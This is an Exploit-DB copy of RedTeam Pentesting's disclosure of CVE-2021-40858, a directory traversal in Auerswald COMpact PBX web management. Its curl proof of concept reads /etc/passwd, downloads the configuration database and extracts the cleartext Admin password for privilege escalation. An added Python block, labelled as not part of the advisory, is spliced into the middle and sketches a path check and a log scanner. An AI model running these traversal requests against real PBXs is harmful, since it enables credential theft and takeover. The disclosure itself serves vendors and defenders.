Auerswald COMpact 8.0B – Arbitrary File Disclosure

  • Author: RedTeam Pentesting GmbH
    Date: 2021-12-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50568/
  • # Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure
    # Date: 06/12/2021
    # Exploit Author: RedTeam Pentesting GmbH
    
    Advisory: Auerswald COMpact Arbitrary File Disclosure
    
    
    RedTeam Pentesting discovered a vulnerability in the web-based
    management interface of the Auerswald COMpact 5500R PBX which allows
    users with the "sub-admin" privilege to access any files on the PBX's
    file system.
    
    
    Details
    =======
    
    Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
    Affected Versions: <= 8.0B (COMpact4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
    Fixed Versions: 8.2B
    Vulnerability Type: Arbitrary File Disclosure
    Security Risk: medium
    Vendor URL: https://www.auerswald.de/en/product/compact-5500r
    Vendor Status: fixed version released
    Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
    Advisory Status: published
    CVE: CVE-2021-40858
    CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858
    
    
    Introduction
    ============
    
    "Fully modular VoIP appliance for more efficient communication processes
    With the COMpact 5500R, you are originally equipped for everyday
    business - now and in the future.
    
    The fully modular architecture with 80 IP channels and all the functions
    of a large ITC server allows up to 112 subscribers and thus scales with
    your company.
    
    Continuous maintenance and expansion of the system software makes this
    versatile IP server a future-proof investment in any business
    communication."
    
    (from the vendor's homepage)
    
    
    More Details
    ============
    
    RedTeam Pentesting discovered that attackers with administrative access
    to the PBX's web-based management interface (as a so-called "sub-admin")
    can download arbitrary files from the PBX's file system. This includes
    the usually not accessible configuration database which contains the
    password for the highly privileged "Admin" user in clear text.
    
    
    Proof of Concept
    ================
    
    The command-line HTTP client curl[1] can be used to log into the
    management interface of the PBX with the username "sub-admin" and the
    password "verysecretpassword" as follows:
    
    ------------------------------------------------------------------------
    $ curl --anyauth --user sub-admin:verysecretpassword --include \
    https://192.168.1.2/tree
    
    [...]
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
    [...]
    
    [{"login":2,"userId":2222,[...]}]
    ------------------------------------------------------------------------
    
    The server returns a session ID in a cookie which is then used to check
    the access level:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    https://192.168.1.2/logstatus_state
    
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {"logstatus":"Sub-Administrator"}
    ------------------------------------------------------------------------
    
    In the PBX's user management, the access level "Sub-Administrator" is
    used for user accounts that should be able to configure the PBX. There
    are also other, higher-level access privileges.
    
    Users with the "sub-admin" privilege can configure music on hold (MOH,
    "Wartemusik"), and for example listen to the currently configured music.
    In order to do this, the browser requests the music files from the PBX.
    
    The file "alarm1.wav" can be accessed with curl as follows:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\
    '&pageindex=1'
    
    HTTP/1.1 200 OK
    Content-Type: audio/x-wav; charset=
    Content-Length: 132192
    Content-disposition: attachment; filename="alarm1.wav"
    [...]
    ------------------------------------------------------------------------
    
    It was found that the PBX allows directory traversal with the string
    "../", so the file "/etc/passwd" can be accessed as follows:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/wartemusik_verwaltung_play?'\
    'fileName=../../etc/passwd&pageindex='
    
    HTTP/1.1 200 OK
    [...]
    Content-Length: 113
    Content-disposition: attachment; filename="../../etc/passwd"
    [...]
    
    root::0:0:root:/root:/bin/sh
    netstorage::1:1::/data/ftpd:/bin/false
    web::2:2::/opt/auerswald/lighttpd:/bin/false
    ------------------------------------------------------------------------
    
    The same issue is present in the function for managing logos. A regular
    request for the file "logo1.jpg" is shown below:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'
    
    HTTP/1.1 200 OK
    X-XSS-Protection: 1
    Content-Type: image/jpg; charset=UTF-8
    Content-Length: 13986
    Content-disposition: attachment; filename="logo1.jpg"
    [...]
    ------------------------------------------------------------------------
    
    In a similar fashion as before, the file "/etc/passwd" can be accessed:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'
    
    HTTP/1.1 200 OK
    [...]
    
    root::0:0:root:/root:/bin/sh
    netstorage::1:1::/data/ftpd:/bin/false
    web::2:2::/opt/auerswald/lighttpd:/bin/false
    ------------------------------------------------------------------------
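    The two traversal requests above share one root cause: the fileName parameter is joined onto a directory without being confined to it. As an added defensive example (not part of the advisory and not the vendor's code), the following Python shows the check the affected handlers lacked, restricting fileName to a plain file inside the endpoint's directory, and a scanner that flags traversal attempts against the two affected endpoints in web-server access log lines. The directory paths, the common-log-format layout and the log lines themselves are constructed assumptions.

```python
import os
from urllib.parse import urlsplit, parse_qs, unquote

# Base directory per affected endpoint (constructed assumption; the real
# locations on the PBX are not given in the advisory)
ALLOWED_DIRS = {
    "/wartemusik_verwaltung_play": "/data/moh",
    "/logo_verwaltung_preview": "/data/logos",
}

def safe_file_path(base_dir, file_name):
    """Canonical path of file_name inside base_dir, or None when the name
    would leave base_dir (the check the affected handlers lacked)."""
    # Accept only a plain file name: no separators, no dot entries
    if not file_name or file_name in (".", "..") or "/" in file_name or "\\" in file_name:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, file_name))
    # Defence in depth: the canonical path must still lie below base_dir
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def flag_traversal_requests(log_lines):
    """(client, endpoint, fileName) for requests to the affected endpoints
    whose fileName parameter tries to leave the directory."""
    hits = []
    for line in log_lines:
        quoted = line.split('"')
        if len(quoted) < 2:
            continue
        request = quoted[1].split()  # e.g. GET /path?query HTTP/1.1
        if len(request) < 2:
            continue
        url = urlsplit(request[1])
        if url.path not in ALLOWED_DIRS:
            continue
        for name in parse_qs(url.query).get("fileName", []):
            decoded = unquote(name)  # parse_qs decoded once; catch a 2nd layer
            if "../" in decoded or "..\\" in decoded or decoded.startswith("/"):
                hits.append((line.split()[0], url.path, decoded))
    return hits

# Constructed access-log lines; the 2nd and 3rd mirror the advisory's requests
SAMPLE_LOG = [
    '192.168.1.50 - - [06/Dec/2021:10:00:01 +0100] "GET /wartemusik_verwaltung_play?fileName=alarm1.wav&pageindex=1 HTTP/1.1" 200 132192',
    '192.168.1.50 - - [06/Dec/2021:10:00:07 +0100] "GET /wartemusik_verwaltung_play?fileName=../../etc/passwd&pageindex= HTTP/1.1" 200 113',
    '192.168.1.50 - - [06/Dec/2021:10:00:12 +0100] "GET /logo_verwaltung_preview?fileName=..%2F..%2Fdata%2Fdb%2Fpbx4.db HTTP/1.1" 200 5120',
]
```

On the real device the same check has to run on every download endpoint, and a 200 response for a flagged request is the signal that the traversal actually succeeded.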
    
    For attackers, an interesting file is the SQLite[2] database file
    "/data/db/pbx4.db". It can be downloaded as follows:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
    '192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
     > pbx4.db
    
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100  5120  100  5120    0     0  16253      0 --:--:-- --:--:-- --:--:-- 16305
    ------------------------------------------------------------------------
    
    This file contains the password for the highly privileged "Admin" user
    account:
    
    ------------------------------------------------------------------------
    $ sqlite3 pbx4.db
    SQLite version 3.27.2 2019-02-25 16:06:06
    Enter ".help" for usage hints.
    
    sqlite> .tables
    DbFileVersion  PbxMisc
    
    sqlite> select * from PbxMisc;
    [...]
    AdminPasswdHash|
    AdminLogin|Admin
    AdminPin|43214321
    AdminPasswd|S3kr1t!
    ------------------------------------------------------------------------
    
    The username and password can then be used to log into the web
    application:
    
    ------------------------------------------------------------------------
    $ curl --user 'Admin:S3kr1t!' --anyauth --include \
    https://192.168.1.2/tree
    
    HTTP/1.1 200 OK
    Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
    [...]
    
    [{"login":3,"userId":0,"userName":"",[...]}]
    ------------------------------------------------------------------------
    
    Checking the access level reveals the new privilege:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
    https://192.168.1.2/logstatus_state
    
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {"logstatus":"Administrator"}
    ------------------------------------------------------------------------
    
    The user "Admin", in contrast to regular administrative users
    ("sub-admin"), can access more functions and for example apply firmware
    updates.
    
    Workaround
    ==========
    
    Disable or restrict access to the web-based management if possible.
    
    
    Fix
    ===
    
    Upgrade to a firmware version which corrects this vulnerability.
    
    
    Security Risk
    =============
    
    Attackers who already have acquired administrative access as a so-called
    "sub-admin" can download a database file and access the password for the
    highly privileged "Admin" account. This account can use more functions and
    is allowed to apply firmware updates.
    
    On the one hand, exploiting this vulnerability already requires
    administrative access. On the other hand, attackers can obtain
    high-privileged access to the PBX and use functions not available to
    "sub-admin" users, like firmware updates. All in all, this vulnerability
    is therefore rated to have a medium risk potential.
    
    
    Timeline
    ========
    
    2021-08-26 Vulnerability identified
    2021-09-01 Customer approved disclosure to vendor
    2021-09-10 Vendor notified
    2021-09-10 CVE ID requested
    2021-09-10 CVE ID assigned
    2021-10-05 Vendor provides access to device with fixed firmware
    2021-10-11 Vendor provides fixed firmware
    2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
    2021-12-06 Advisory published
    
    
    References
    ==========
    
    [1] https://curl.se
    [2] https://www.sqlite.org
    
    
    RedTeam Pentesting GmbH
    =======================
    
    RedTeam Pentesting offers individual penetration tests performed by a
    team of specialised IT-security experts. Hereby, security weaknesses in
    company networks or products are uncovered and can be fixed immediately.
    
    As there are only few experts in this field, RedTeam Pentesting wants to
    share its knowledge and enhance the public knowledge with research in
    security-related areas. The results are made available as public
    security advisories.
    
    More information about RedTeam Pentesting can be found at:
    https://www.redteam-pentesting.de/
    
    
    Working at RedTeam Pentesting
    =============================
    
    RedTeam Pentesting is looking for penetration testers to join our team
    in Aachen, Germany. If you are interested please visit:
    https://www.redteam-pentesting.de/jobs/
    
    
    -- 
    RedTeam Pentesting GmbH Tel.: +49 241 510081-0
    Dennewartstr. 25-27 Fax : +49 241 510081-99
    52068 Aachen                     https://www.redteam-pentesting.de
    Germany Registergericht: Aachen HRB 14004
    Geschäftsführer: Patrick Hof, Jens Liebchen